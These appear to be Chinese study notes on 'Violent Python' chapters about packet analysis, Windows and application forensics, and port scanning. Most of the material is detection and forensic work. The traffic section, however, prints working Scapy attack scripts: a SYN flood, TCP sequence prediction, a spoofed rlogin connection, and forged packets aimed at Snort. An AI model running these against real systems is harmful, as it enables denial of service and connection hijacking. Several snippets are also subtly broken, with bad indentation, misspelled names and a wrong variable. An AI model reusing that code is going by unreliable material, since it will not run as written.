在以伪装扫描模式运行 Nmap 时，使用 -D 参数后跟一个 IP 地址。此外，还可以用 -ttl 参数把 TTL 值固定为 13。

nmap 192.168.1.7 -D 8.8.8.8 -ttl 13

在目标主机 192.168.1.7 上，用 verbose 模式（-v）运行 tcpdump，禁用名称解析（-nn），并只显示与地址 8.8.8.8 相关的流量（host 8.8.8.8）。可以看到 nmap 成功地用假地址 8.8.8.8 发送了 TTL 值为 13 的伪造数据包。

用 scapy 解析 TTL 字段的值

from scapy.all import *

def test_ttl(pkt):
    try:
        if pkt.haslayer(IP):
            ipsrc = pkt.getlayer(IP).src
            ttl = str(pkt.ttl)
            print("[+] Pkt Received From: {} with TTL: {}".format(ipsrc, ttl))
    except:
        pass
    
def main():
    sniff(prn=test_ttl, store=0)

Linux/Unix 系统通常把 TTL 的初始值设为 64，而 Windows 系统则把它设为 128。

需要把内网/私有 IP 地址（10.0.0.0~10.255.255.255、172.16.0.0~172.31.255.255，以及 192.168.0.0 ~ 192.168.255.255）的数据包全部去掉。要做到这一点，需要导入 IPy 库。为了避免 IPy 库中的 IP 类与 Scapy 库中的 IP 类冲突，把它重命名为 IPTEST 类。如果 IPTEST(ipsrc).iptype() 返回 PRIVATE，就忽略对该数据包的检查。

可能会收到来自同一个源地址的多个数据包，而我们又不想重复检查同一个源地址。如果之前从未见过这个源地址，则要构建一个目标 IP 地址为这个源地址的 IP 包，这个包应该是一个 ICMP 请求报，这样目标主机就会做出回应。一旦目标主机做出了响应，我们就把 TTL 值存储在一个用源 IP 地址作为索引的词典中。然后将实际收到的 TTL 与原始数据包中的 TTL 放在一起，判断它们的差值是否超过了一个阈值。走不同的路径到达目标主机的数据包所经过的路由设备的数量可能会有所差异，因此其 TTL 也可能不完全一样。但是，如果中继跳数的差超过了 5 跳，则可以推断该 TTL 是假的。

from scapy.all import *
from IPy import IP as IPTEST
ttl_values = {}
THRESH = 5

def check_ttl(ipsrc, ttl):
    if IPTEST(ipsrc).iptype() == "PRIVATE":
        return
    if not ttl_values.has_key(ipsrc):
        pkt = sr1(IP(dst=ipsrc) / ICMP(), retry=0, timeout = 1, verbose=0)
        ttl_values[ipsrc] = pkt.ttl
	if abs(int(ttl) - int(ttl_values[ipsrc])) > THRESH:
        print("[!] Detected Possible Spoofed Packet From: {}".format(ipsrc))
        print("[!] TTL: {}, Actual TTL: {}".format(ttl, str(ttl_values[ipsrc])))

尽管 RFC 1700 中建议把默认的 TTL 值设为 64，但是自 MS Windows NT 4.0 起，微软 Windows 就已经把 TTL 的初始值设为 128 了。此外，其他一些类 UNIX 系统也会使用不同的 TTL 初始值，比如 Solaris 2.x 的默认 TTL 初始值就是 255。

“风暴”（Storm）的 fast-flux 和 Conficker 的 domain-flux

名为 fast-flux 的技术使用域名服务（DNS）记录隐藏指挥风暴僵尸网络的控制与命令信道。DNS 记录一般是用来将域名转换为 IP 地址的。当 DNS 服务器返回一个结果时，它会同时指定一个 TTL——告诉主机这个 IP 地址在多长的时间里肯定是有效的，因此在这段时间里无须再次解析该域名。

风暴僵尸网络背后的攻击者会非常频繁地改变用于指挥与控制服务器的 DNS 记录。事实上，他们使用了分布在 50 多个国家的 384 个网络供应商手上的 2000 台冗余服务器。攻击者频繁地且切换指挥与控制服务器的 IP 地址，并在 DNS 查询结果中返回一个很短的 TTL。这种快速变化 IP 地址的做法（fast-flux）使得别人很难找出僵尸网络的指挥与控制服务器。

Conficker 是迄今为止最成功的电脑蠕虫病毒，通过 Windows 服务消息块（Windows Service Message Block，SMB）协议中的一个漏洞传播。一旦被感染，有漏洞的机器便联络命令与控制服务器，以获得进一步的指令。然而，Conficker 每三个小时会使用 UTC 格式的当前日期和时间生成一批不同的域名。对 Conficker 的第三个版本来说，这意味着每三个小时生成 50000 个域名。攻击者只注册了这些域名中的很少一部分，让它们能映射成真正的 IP 地址。这使得拦截和阻止来自命令与控制服务器的流量变得十分困难。由于该技术是轮流使用域名的，所以研究人员便将其命名为 domain-flux

你的 DNS 知道一些不为你所知的吗？

用 tcpdump 检查 DNS 查询过程可以看到，客户端向 DNS 服务器发送了一次请求。具体地说，客户端生成了一个 DNS Question Record（DNSQR），查询对应域名的 IPv4 地址。服务器响应了一个 DNS Resource Record（DNSRR），给出了域名的 IP 地址。

使用 Scapy 解析 DNS 流量

在用 Scapy 检查这些 DNS 协议请求包时，要检查的字段在 DNSQR 和 DNSRR 包都存在。一个 DNSQR 包中含有查询的名称（qname）、查询的类型（qtype）和查询的类别（qclass）。服务器相应的一个对应的 DNSRR，其中含有资源记录名名称（rrname）、类型（type）、资源记录类别（rclass）和 TTL。

欧洲网络和信息安全机构（The European Network and Information Security Agency）提供了一个分析网络流量的极好资源，该机构提供一个可启动的 DVD ISO 镜像，其中还含有几个网络抓包文件和练习。其中练习 7 中演示了 fast-flux 行为的 pcap 包。

用 Scapy 找出 `fast-flux` 流量

写一个 Python 脚本，从 pcap 文件中读取数据，并把所有含 DNSRR 的数据包解析出来

from scapy.all import *
dns_records = dict()

def handle_pkt(pkt):
    if pkt.haslayer(DNSRR):
        rrname = pkt.getlayer(DNSRR).rrname
        rdata = pkt.getlayer(DNSRR).rdata
        if dns_records.has_key(rrname):
            if rdata not in dns_records[rrname]:
                dns_records[rrname].append(rdata)
        else:
            dns_records[rrname] = list()
            dns_records[rrname].append(rdata)
            
def main():
    pkts = rdpcap("fast_flux.pcap")
    for pkt in pkts:
        handle_pkt(pkt)
    for item in dns_records:
        print("[+] {} has {} unique IPs.".format(item, len(dns_records[item])))

用 Scapy 找出 Domain Flux 流量

Conficker 使用的是 domain-flux 技术，我们需要寻找的就是那些对未知域名查询回复出错消息的服务器响应包。DNS 服务器是没法把大多数域名转换为真正的 IP 地址的，对这些域名，服务器回复一个出错了的消息。可以通过找出所有含域名出错的错误代码的 DNS 响应包的方式，实时地识别出 domain-flux

再次读取网络抓包文件，并逐一检查抓包文件中的各个数据包。只检查来自服务器 53 端口的数据包——这种包中含有资源记录。DNS 数据包中有一个 rcode 字段。当 rcode 等于 3 时，表示的是域名不存在。然后把域名打印在屏幕上，并更新所有未得到应答的域名请求的计数器。

from scapy.all import *

def dns_qrtest(pkt):
    if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53:
        rcode = pkt.getlayer(DNS).rcode
        qname = pkt.getlayer(DNSQR).qname
        if rcode == 3:
            print("[!] Name request lookup failed: {}".format(qname))
            return True
        else:
            return False

def main():
    un_ans_reqs = 0
    pkts = rdpcap("domain_flux.pcap")
    for pkt in pkts:
        if dns_qrtest(pkt):
            un_ans_reqs = un_ans_reqs + 1
            print("[!] {} Total Unanswered Name Requests".format(un_ans_reqs))

Kevin Mitnick 和 TCP 序列号预测

Mitnick 使用了一种劫持 TCP 会话的方法。这种技术被称为 TCP 序列号预测，这一技术利用的是原本设计用来区分各个独立的网络连接的 TCP 序列号的生成缺乏随机性这一缺陷。这一缺陷加上 IP 地址欺骗，使得 Mitnick 能够劫持家用电脑中的某个连接。

预测你自己的 TCP 序列号

Mitnick 攻击的机器与某台远程服务器之间有可信协议。远程服务器可以通过在 TCP 513 端口上运行的远程登录协议（rlogin）访问 Mitnick 被攻击的计算机。rlogin 并没有使用公钥/私钥协议或口令认证，而是使用了一种不太安全的认证方法——绑定源 IP 地址。

为了攻击电脑，Mitnick 必须做到以下 4 点：

（1）找到一个受信任的服务器

（2）使该服务器无法再做出响应

（3）伪造来自服务器的一个连接

（4）盲目伪造一个 TCP三次握手的适当说明

Mitnick 找到与个人电脑之间有可信协议的远程服务器后，需要使远程服务器不能再发出响应。如果远程服务器发现有人尝试使用服务器 IP 地址进行假连接，它将发送 TCP 重置（reset）数据包关闭连接。为了使服务器无法再做出响应，Mitnick 向服务器上的远程登录（rlogin）端口发出了许多 TCP SYN 数据包，即 SYN 泛洪攻击（SYN Flood），这种攻击将会填满服务器的连接队列，使之无法做出任何响应。

使用 Scapy 制造 SYN 泛洪攻击

用 Scapy 重新实现 SYN 泛洪攻击，只需要制造一些载有 TCP 协议层的 IP 数据包，让这些包里 TCP 源端口不断地自增一，而目的 TCP 端口总是为 513

from scapy.all import *

def syn_flood(src, target):
    for sport in range(1024, 65535):
        ip_layer = IP(src=src, dst=target)
        tcp_layer = TCP(sport=sport, dport=513)
        pkt = ip_layer / tcp_layer
        send(pkt)
src = "10.1.1.2"
target = "192.168.1.3"
syn_flood(src, target)

计算 TCP 序列号

Mitnick 能够伪造一个 TCP 连接到目标。不过，这取决于他能够发送伪造 SYN 包的能力，接着被攻击的机器会返回一个 TCP SYN-ACK 包确认连接。为了完成连接，Mitnick 需要在 SYN-ACK 中正确地猜出 TCP 的序列号（因为他无法观察到），然后把猜到的正确的 TCP 序列号放在 ACK 包中发送回去。

在 Python 中重现这一过程，将发送一个 TCP SYN 包，然后等待 TCP SYN-ACK 包。收到之后，将从这个确认包中读出 TCP 序列号，并把它打印到屏幕上。编写的函数 cal_tsn 将接收目标 IP 地址这个参数，返回下一个 SYN-ACK 包的序列号（当前 SYN-ACK 包的序列号加上差值）

from scapy.all import *
def cal_tsn(target):
    seq_num = 0
    pre_num = 0
    diff_seq = 0
    for x in range(1, 5):
        if pre_num != 0:
            pre_num = seq_num
        pkt = IP(dst=target) / TCP()
        ans = sr1(pkt, verbose=0)
        seq_num = ans.getlayer(TCP).seq
        diff_seq = seq_num - pre_num
        print("[+] TCP Seq Difference: {}".format(diff_seq))
	return seq_num + diff_seq

target = "192.168.1.106"
seq_num = cal_tsn(target)
print("[+] Next TCP Sequence Number to ACK is: {}".format(seq_num + 1))

伪造 TCP 连接

在 Python 中重现这一行为，将创建和发送两个数据包。首先，创建一个 TCP 源端口为 513，目标端口为 514，源 IP 地址为被假冒的服务器，目标 IP 地址为被攻击计算机的 SYN 包。接着，创建一个相同的 ACK 包，并把计算得到的序列号填入相应的字段中，最后把它发送出去

from scapy.all import *

def spoof_conn(src, target, ack):
    ip_layer = IP(src=src, dst=target)
    tcp_layer = TCP(sport=513, dport=514)
    syn_pkt = ip_layer / tcp_layer
    send(syn_pkt)
    ip_layer = IP(src=src, dst=target)
    tcp_layer = TCP(sport=513, dport=514, ack=ack)
    ack_pkt = ip_layer / tcp_layer
    send(ack_pkt)

src = "10.1.1.2"
target = "192.168.1.106"
seq_num = 2024371201
spoof_conn(src, target, seq_num)

使用 Scapy 愚弄入侵检测系统

入侵检测系统（Intrusion DetectionSystem，IDS），基于网络的入侵检测系统（network-based intrusion detection system，NIDS）可以通过记录流经 IP 网络的数据包实时地分析流量。用已知的恶意特征码对数据包进行扫描，IDS 可以在攻击成功之前就向网络分析师发出警报。SNORT 这个 IDS 系统自带的许多不同规则，就使它能够识别出许多包括不同类型的踩点，漏洞利用已经拒绝服务攻击在内的真实环境中的攻击手段。检查其中一些规则配置文件中的内容，可以看到针对 TFN、tfn2k 和 Trin00 分布式拒绝服务攻击工具包的四个警报触发规则。

cat /etc/snort/rules/ddos.rules

第一条警报触发规则——DDoS TFN 探针（DDoS TFN Probe）

from scapy.all import *
def ddos_test(src, dst, iface, count):
    pkt = IP(src=src, dst=dst) / ICMP(type=8,id=678) / Raw(load="1234")
    send(pkt, iface=iface, count=count)
    pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load="AAAAAAAAA")
    send(pkt, iface=iface, count=count)
    pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load="PONG")
    send(pkt, iface=iface, count=count)
    pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
    send(pkt, iface=iface, count=count)
    
src = "1.3.3.7"
dst = "192.168.1.106"
iface = "eth0"
count = 1
ddos_test(src, dst, iface, count)

接着看 SNORT 的 exploit.rules 签名文件中更复杂的警报触发规则：

def exploit_test(src, dst, iface, count):
    pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00...")
    send(pkt, iface=iface, count=count)
    pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02...")
    send(pkt, iface=iface, count=count)

最后，伪造一些踩点或扫描操作也挺不错的。查看 SNORT 中关于扫描的警报触发规则，找到两个可以生成对应数据包的警报触发规则。这两个规则检测的是：发往 UDP 协议上的某些特定端口的数据包的内容中有无特定的特征码，如果有，则触发警报。

以下生成了两个会触发 cybercop 扫描器和 Amanda 扫描器扫描报警的数据包：

def scan_test(src, dst, iface, count):
    pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load="cybercop")
    send(pkt)
    pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load="Amanda")
    send(pkt, iface=iface, count=count)

Forensic Investigations with Python

2024-08-21T00:00:00+00:00

用 Python 进行取证调查

你曾经去过哪里？——在注册表中分析无线访问热点

Windows 注册表是一个分层式的数据库，其中存储了操作系统的配置设置信息。

从 Windows Vista 起，注册表在 HKLM\SOFT_WARE\Microsoft\Windows NT\CurrentVersion\Network-List\Signatures\Unmanaged 子键中就会存储所有的网络信息。在 Windows 命令行提示符中，我们能列出每个网络显示出 profile Guid 对网络的描述、网络名和网关的 MAC 地址。

C:\Windows\system32\reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged" /s HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\NetworkList\Signatures\Unmanaged\010103000F0000F008000000F0000F04BCC2360E4B8F7DC8BDAFAB8AE....

ProfileGuid	REG_SZ	...
Description	REG_SZ	...

使用 WinReg 读取 Windows 注册表中的内容

注册表中把网关 MAC 地址存为 REG_BINARY 类型的。形如：00115024687F0000，其实就是地址 00:11:50:24:68:7F，下面这个函数可以实现转换：

def val2addr(val):
    addr = str()
    for ch in val:
        addr += "%02x " % ord(ch)
    addr = addr.strp(" ").replace(" ", ":")[0:17]
    return addr

接下来要从 Windows 注册表指定的键值中提取各个被列出来的网络名称和 MAC 地址。需要使用 _winreg 库，这是 Python 的 Windows 版安装程序默认会安装的一个库。

from _winreg import *
def print_nets():
    net = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"
    key = OpenKey(HKEY_LOCAL_MACHINE, net)
    print("[*] Networks You have Joined.")
    for i in range(100):
        try:
            guid = EnumKey(key, i)
            net_key = OpenKey(key, str(guid))
            n, addr, t = EnumValue(net_key, 5)
            n, name, t = EnumValue(net_key, 4)
            mac_addr = val2addr(addr)
            net_name = str(name)
            print("[+] {} {}".format(net_name, mac_addr))
            CloseKey(net_key)
        except:
            break

确保在拥有管理员权限的命令行窗口中运行，就可以读取注册表中的键值

使用 Mechanize 把 MAC 地址传给 Wigle

知道了无线访问热点的 MAC 地址之后，可以把访问热点的物理位置也打印出来。许多数据库中，都有海量的把无线访问热点与它们所在的物理位置相对应起来的列表。

SkyHook 数据库提供了一个根据 Wi-Fi 的位置获取地理位置信息的软件开发包。Ian McCracken 开发的一个开源项目让我们能访问这个数据库。还有 Google、微软等都有 Wi-Fi 地址位置数据库。

数据库，也是开源项目仍然允许用户根据无线访问热点的 MAC 地址得到它所在的物理位置。通过网页查询某个无线 SSID MAC 地址对应的物理位置，并收集响应页面。其中返回结果 maplat=47.25264359&maplon=-87.25624084 表示的就是无线访问热点的经度和纬度。

需要使用 mechanize 库，它允许 Python 编写带状态的 Web 程序。也就是说在正确地登陆 Wigle 服务器后，它会保存和重用登陆认证 cookie。

import mechanize, urllib, re, urlparse
def wigle_print(username, password, netid):
    browser = mechanize.Browser()
    browser.open("http://wigle.net")
    req_data = urllib.urlencode({"credential_0": username, "credential_1": password})
    
    browser.open("https://wigle.net/gps/gps/main/login", req_data)
    params = {}
    params["netid"] = netid
    req_params = urllib.urlencode(params)
    resp_url = "http://wigle.net/gps/gps/main/confirmquery/"
    resp = browser.open(resp_url, req_params).read()
    map_lat = "N/A"
    map_lon = "N/A"
    r_lat = re.findall(r"maplat=.*\&", resp)
    if r_lat:
        map_lat = r_lat[0].split("&")[0].split("=")[1]
    r_lon = re.findall(r"maplon=.*\&", resp)
    if r_lon:
        map_lon = r_lon[0].split()
    print("[-] Lat: {}, Lon: {}".format(map_lat, map_lon))

用 Python 恢复被删入回收站中的内容

在使用 FAT 文件系统的 Windows 98 及之前的 Windows 系统中，回收站目录是 C:\Recycled\。在包括 Windows NT/2000 和 Windows XP 在内的支持 NTFS 的操作系统中，回收站是 C:\Recycler\目录。在 Windows Vista 和 Windows 7 中，回收站目录则是 C:\$Recycle.Bin

使用 OS 模块寻找被删除的文件/文件夹

依次测试各个文件夹即可，不是判断操作系统再来找对应文件夹

import os
def return_dir():
    dirs = ["c:/Recycler/", "c:/Recycled/", "C:/$Recycle.Bin/"]
    for recycle_dir in dirs:
        if os.path.isdir(recycle_dir):
            return recycle_dir
    return None

在找到回收站目录之后，就要去检查其中的内容。其中有两个子目录，都含有字符串 S-1-5-21-1275210071-1715567821-725345543-，并分别以 1005 或 500 结尾。这个字符串表示的是用户的 SID，它对应的是机器里一个唯一的用户帐户

用 Python 把 SID 和用户名关联起来

可以用 Windows 注册表把 SID 转换成一个准确的用户名。检查的是注册表键 HKEY_LOCAL_MACHINE\SOFT-WARE\Microsoft\Windows NT\CurrentVersion\ProfileList\\ProfileImagePath，看到返回的是 %SystemDrive%\Documents and Settings\ 值。通过 reg query 命令，可以直接把 SID 转成用户名

C:\RECYCLER>reg query "HKEY_LOCAL...." /v ProfileImagePath

通过 Python 实现，打开注册表检查 ProfileImagePath 键，提取出其中存放的值，并返回位于用户路径中最后一个反斜杠之后的用户名

from _winreg import *
def sid2user(sid):
    try:
        key = OpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\{}".format(sid))
        value, type = QueryValueEx(key, "ProfileImagePath")
        user = value.split("\\")[-1]
        return user
    except:
        return sid

元数据

作为一种文件里非明显可见的对象，元数据可以存在于文档、电子表格、图片、音频和视频文件中。创建这些文件的应用程序可能会把文档的作者、创建和修改时间、可能的更新版本和注释这类详细信息存储下来。

使用 PyPDF 解析 PDF 文件中的元数据

PyPDF 允许提取文档中的内容，或对文档进行分割、合并、复制、加密和解密操作。若要提取元数据，可以使用 .getDocumentInfo() 方法，该方法会返回一个 tuple 数组，每个 tuple 中都含有对元数据元素的一个描述及它的值。逐一遍历这个数组，就能打印出 PDF 文档的所有元数据。

import pyPdf
from pyPdf import PdfFileReader
def print_meta(file_name):
    pdf_file = PdfFileReader(file(file_name, "rb"))
    doc_info = pdf_file.getDocumentInfo()
    print("[*] PDF MetaData For: {}".format(file_name))
    for meta_item in doc_info:
        print("[+] {}:{}".format(meta_item, doc_info[meta_item]))

理解 Exif 元数据

Exif（exchange image file format，交换图像文件格式）标准定义了如何存储图像和音频文件的标准。

Exif 标准中含有多个对取证调查非常有用的标签（tag），工具 exiftool 用它可以解析这些标签。

用 BeautifulSoup 下载图片

BeautifulSoup 允许我们快速解析 HTML 和 XML 文档

实现查找所有 img 标签并下载：

import urllib2
from bs4 import BeautifuleSoup
from urlparser import urlsplit
from os.path import basename

def find_images(url):
    print("[+] Finding images on {}".format(url))
    url_content = urllib2.urlopen(url).read()
    soup = BeautifulSoup(url_content)
    img_tags = soup.findAll("img")
    return img_tags

def download_image(img_tag):
    try:
        print("[+] Downloading image...")
        img_src = img_tag["src"]
        img_content = urllib2.urlopen(img_src).read()
        img_file_name = basename(urlsplit(img_src)[2])
        img_file = open(img_file_name, "wb")
        img_file.write(img_content)
        img_file.close()
        return img_file_name
    except:
        return ""

用 Python 的图像处理库读取图片中的 Exif 元数据

利用 PIL 库提取 GPS 元数据：

from PIL import Image
from PIL.ExifTags import  TAGS

def test_for_exif(image_file_name):
    try:
        exif_data = {}
        img_file = Image.open(image_file_name)
        info = img_file._getexif()
        if info:
            for tag, value in info.items():
                decoded = TAGS.get(tag, tag)
                exif_data[decoded] = value
            exif_gps = exif_data["GPSINFO"]
            if exif_gps:
                print("[*] {} contains GPS MetaData".format(img_file_name))
    except:
        pass

用 Python 分析应用程序的使用记录

理解 Skype 中的 SQLite3 数据库

在 Windows 系统中，Skype 在 C:\Documents and Settings\\ApplicationData\Skype\ 目录中存储了一个名为 main.db 的数据库。在 macOS 系统中，这个数据库的存储路径为 /Users//Library/Application Support/Skype/

连接 SQLite3 数据库后 SELECT tbl_name FROM sqlite_master WHERE type=='table'，SQLite 数据库维护一张名为 sqlite_master 的表，这张表中含有一个名为 tbl_name 的列，其中描述了数据库中的各张表。

Accounts 表记录了使用该应用程序的用户账户的相关信息，其中的各列记录了用户名、Skype 的昵称、用户的位置和创建该账户的日期等信息。

数据库是以 UNIX 时间格式存储账户创建时间的，SQL 方法 datetime() 可以把这个值转换成更方便阅读的格式

使用 Python 和 SQLite3 自动查询 Skype 的数据库

import sqlite3
def print_profile(skype_db):
    conn = sqlite3.connect(skype_db)
    c = conn.cursor()
    c.execute("SELECT fullname, skypename, city, country, datetime(profile_timestamp, 'unixepoch') FROM Accounts;")
    for row in c:
        print("[*] -- Found Account --")
        print("[+] User: {}".format(row[0]))
        print("[+] Skype Username: {}".format(row[1]))
        print("[+] Location: {},{}".format(row[2], row[3]))
        print("[+] Profile Date: {}".format(row[4]))

多表处理：

def print_call_log(skype_db):
    conn = sqlite3.connect(skype_db)
    c = conn.cursor()
    c.execute("SELECT datetime(begin_timestamp, 'unixepoch'), identity FROM calls, conversations WHERE calls.conv_dbid = conversations.id;")
    print("[*] -- Found Calls --")
    for row in c:
        print("[+] Time: {} | partner: {}".format(row[0], row[1]))

Skype 的数据库会把所有发送和收到的消息都保存在数据库中。数据库中把这些信息存放在一张名为 Messages 的表中。从这张表中用 SELECT 语句选出 timestamp、dialog_partner、author 和 body_xml。注意，如果 dialog_partner 和 author 字段是不一样的，那么就是数据库的所有者发送这条消息给 dialog_partner 的。反之，如果 dialog_partner 和 author 字段是一样的，就是 dialog_partner 发送的这条消息，这时需要在消息前加一个 from

def print_messages(skype_db):
    conn = sqlite3.connect(skype_db)
    c = conn.cursor()
    c.execute("SELECT datetime(timestamp, 'unixepoch'), dialog_partner, author, body_xml FROM Messages;")
    print("[*] -- Found Messages --")
    for row in c:
        try:
            if "partlist" not in str(row[3]):
                if str(row[1]) != str(row[2]):
                    msg_direction = "To {}: ".format(row[1])
        	else:
            	msg_direction = "From {}: ".format(row[2])
            print("Time: {} {} {}".format(row[0], msg_direction, row[3]))
        except:
            pass

其他有用的一些 Skype 查询语句

只想打印出联系人列表中其生日不为空的联系人：

SELECT fullname, birthday FROM contacts WHERE birthday > 0;	

只想输出 conversation 表中只与某个特定的相关的通话记录：

SELECT datetime(timestamp, 'unixepoch'), dialog_partner, author, body_xml, FROM Messages WHERE dialog_partner=''

要删除 conversation 表中只与某个特定的相关的通话记录

DELETE FROM messages WHERE skypename=''

用 Python 解析火狐浏览器的 SQLite3 数据库

在 Windows 操作系统中，火狐把这些数据库存放在 "C:/Documents and Settings//Application Data/Mozilla/Firefox/Profiles//" 目录中，在 macOS 系统中，火狐把这些数据库存放在 "/Users//Library/Application Support/Firefox/Profiles/" 目录中

文件 downloads.sqlite 数据库时火狐用户下载文件的相关信息。其中只有一张名为 moz_downloads 的表记录了文件名、源下载地址、下载时间、文件大小、引用（referrer）和本地存放该文件的路径。

import sqlite3
def print_downloads(download_db):
    conn = sqlite3.connect(download_db)
    c = conn.cursor()
    c.execute("SELECT name, source, datetime(endTime/1000000, 'unixepoch') FROM moz_downloads;")
    print("[*] --- Files Downloaded ---")
    for row in c:
        print("[+] File: {} from source: {} at: {}".format(row[0], row[1], row[2]))

数据库 moz_cookies 表中保存的是 cookie 相关的数据。

def print_cookies(cookies_db):
    try:
        conn = sqlite3.connect(cookie_db)
        c = conn.cursor()
        c.execute("SELECT host, name, value FROM moz_cookies")
        print("[*] --- Found Cookies ---")
        for row in c:
            host = row[0]
            name = row[1]
            value = row[2]
            print("[+] Host: {}, Cookie: {}, Value: {}".format(host, name, value))
    except Exception as e:
        if "encrypted" in str(e):
            print("[*] Error reading your cookies database.")
            print("[*] Upgrade your Python-Sqlite3 Library")

上网历史记录保存在 places.sqlite 的数据库中，其中的 moz_places 表可以给出关于用户在何时（时间）访问了何处（地址）的网站信息。ForensicWiki 网站上建议使用 moz_places 和 moz_historyvisits 表中的数据，以获取一张真正的浏览器上网历史记录。

SELECT url, datetime(visit_date/1000000, 'unixepoch') FROM moz_places, moz_historyvisits WHERE visit_count > 0 AND moz_places.id == moz_historyvisits.place_id;

用 Python 调查 iTunes 的手机备份

苹果的 iOS 操作系统实际上会跟踪和记录设备的 GPS 经纬度信息，并把它们存储在 consolidated.db 的数据库中。其中有一张名为 Cell-Location 的表，其中含有手机已经收集到的 GPS 定位点。在备份移动设备时，记录到计算机的移动设备的副本也含有这一信息。尽管 iOS 操作系统设计的功能会删除这些地理位置信息，但调查发现这些数据仍然存在。

当用户对 iPhone/iPad 设备进行备份时，它会把相关文件存放到计算机中一个特定的目录中。在 Windows 操作系统中，iTunes 应用程序会把数据存放在用户目录下的移动设备备份目录中（C:/Documents and Settings//Application Data/AppleComputer/MobileSync/Backup），而在 macOS 中，这个目录则是 /Users//Library/Application Support/MobileSync/Backup/。对移动设备进行备份的 iTunes 程序会把所有的设备备份文件都存放在这个目录中。

为了获取关于文件的信息，用 UNIX 命令 file 来分析各个文件的文件类型。可以看到移动设备备份目录中有一些 SQLite3 数据库文件、JPEG 图片文件、纯二进制文件和 ASCII 文本文件

可以用脚本快速列举出在整个移动设备备份目录中每一个数据库中所有表的表名：

SELECT tbl_name FROM sqlite_master WHERE type=="table"

每个 SQLite 数据库中都会维护一张名为 sqlite_master 的表，其中含有整个数据库结构的信息，记录了整个数据库中各张表的结构。

含有 message 表的库即为文本消息数据库，可以把发送时间、对方手机号码以及消息本身打印出来：

SELECT datetime(date, 'unixepoch'), address, text FROM message WHERE address > 0;

Penetration Testing with Python

2024-08-14T00:00:00+00:00

用 Python 进行渗透测试

编写一个端口扫描器

Python 提供了访问 BSD 套接字的接口

Web 服务器可能位于 TCP 80 端口、电子邮件服务器在 TCP 25 端口、FTP 服务器在 TCP 21 端口

TCP 全连接扫描

为了抓取目标主机上应用的 Banner，找到开放的端口后，向它发送一个数据串并等待响应

#!/bin/env python3
# -*- coding: utf-8 -*-
# version: Python3.X
"""
2017.01.29 按照第 2 章编写一个端口扫描器
"""
import optparse
import socket

__author__ = '__L1n__w@tch'


def initialize():
    parser = optparse.OptionParser("usage %prog -H  -p ")

    parser.add_option("-H", dest="target_host", type=str, help="specify target host")
    parser.add_option("-p", dest="target_port", type=int, help="specify target port")

    options, args = parser.parse_args()

    target_host = options.target_host
    target_port = options.target_port

    if target_host is None or target_port is None:
        print(parser.usage)
        exit(-1)

    return target_host, target_port


def connect_scan(target_host, target_port):
    """
    TCP 全连接扫描
    :param target_host: 目标主机
    :param target_port: 目标端口
    :return:
    """
    try:
        conn_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn_sock.connect((target_host, target_port))
        print("[+] {}/tcp open".format(target_port))

        conn_sock.send(b"Violent Python")
        results = conn_sock.recv(1024)
        print("[+] Get Response: {}".format(results))
        conn_sock.close()
    except socket.timeout:
        print("[-] {}/tcp closed".format(target_port))


def port_scan(target_host, target_ports):
    """
    执行端口扫描操作
    :param target_host: 目标主机
    :param target_ports: 目标端口列表
    :return:
    """
    try:
        target_ip = socket.gethostbyname(target_host)
    except RuntimeError:
        print("[-] Can not resolve {}: Unknown host".format(target_host))
        return

    try:
        target_name = socket.gethostbyaddr(target_ip)
        print("[+] Scan results for {}".format(target_name[0]))
    except RuntimeError:
        print("[+] Scan Results for {}".format(target_ip))

    socket.setdefaulttimeout(1)

    for target_port in target_ports:
        print("[*] Scanning port {}".format(target_port))
        connect_scan(target_host, target_port)


if __name__ == "__main__":
    host, port = initialize()
    port_scan(host, [port])

线程扫描

多线程可以提升速度，但是有一个缺点，屏幕打印消息可能会出现乱码和失序。因此需要信号量来进行加解锁，在打印消息前使用 acquire()，打印结束后使用 release()

screen_lock = Semaphore(value=1)
try:
    screen_lock.acquire()
    print("print anything")
finally:
    screen_lock.release()

使用 NMAP 端口扫描代码

除了 TCP 连接扫描外，还需要其他类型的扫描，比如 ACK、RST、FIN 或 SYN-ACK 扫描等

Fyodor Vaskovich 编写的 Nmap 能使用 C 和 Lua 编写的脚本，但是 Nmap 还能被很好地整合到 Python 中。Nmap 可以生成基于 XML 的输出。

其他端口扫描类型

TCP SYN SCAN——半开放扫描，这种类型的扫描发送一个 SYN 包，启动一个 TCP 会话，并等待响应的数据包。如果收到的是一个 reset 包，表明端口是关闭的，而如果收到的是一个 SYN/ACK 包，则表示相应的端口是打开的
TCP NULL SCAN——NULL 扫描把 TCP 头中的所有标志位都设为 NULL。如果收到的是一个 RST 包，则表示相应的端口是关闭的
TCP FIN SCAN——TCP FIN 扫描发送一个表示拆除一个活动的 TCP 连接的 FIN 包，让对方关闭连接。如果收到了一个 RST 包，则表示相应的端口是关闭的
TCP XMAS SCAN——TCP XMAS 扫描发送 PSH、FIN、URG 和 TCP 标志位被设为 1 的数据包。如果收到了一个 RST 包，则表示相应的端口是关闭的

安装好 Python-Nmap 之后，就可以将 Nmap 导入到现有的脚本中，并在 Python 中直接使用 Nmap 扫描功能。创建一个 PortScanner（）类对象，则可以用这个对象完成扫描操作。PortScanner 类有一个 scan() 函数，它可将目标和端口的列表作为参数输入，并对它们进行基本的 Nmap 扫描。

import nmap

def nmap_scan(target_host, target_port):
    nm_scan = nmap.PortScanner()
    nm_scan.scan(target_host, target_port)
    state = nm_scan[target_host]["tcp"][int(target_port)]["state"]
    print("[*] {} tcp/{} {}".format(target_host, target_port, state))

用 Python 构建一个 SSH 僵尸网络

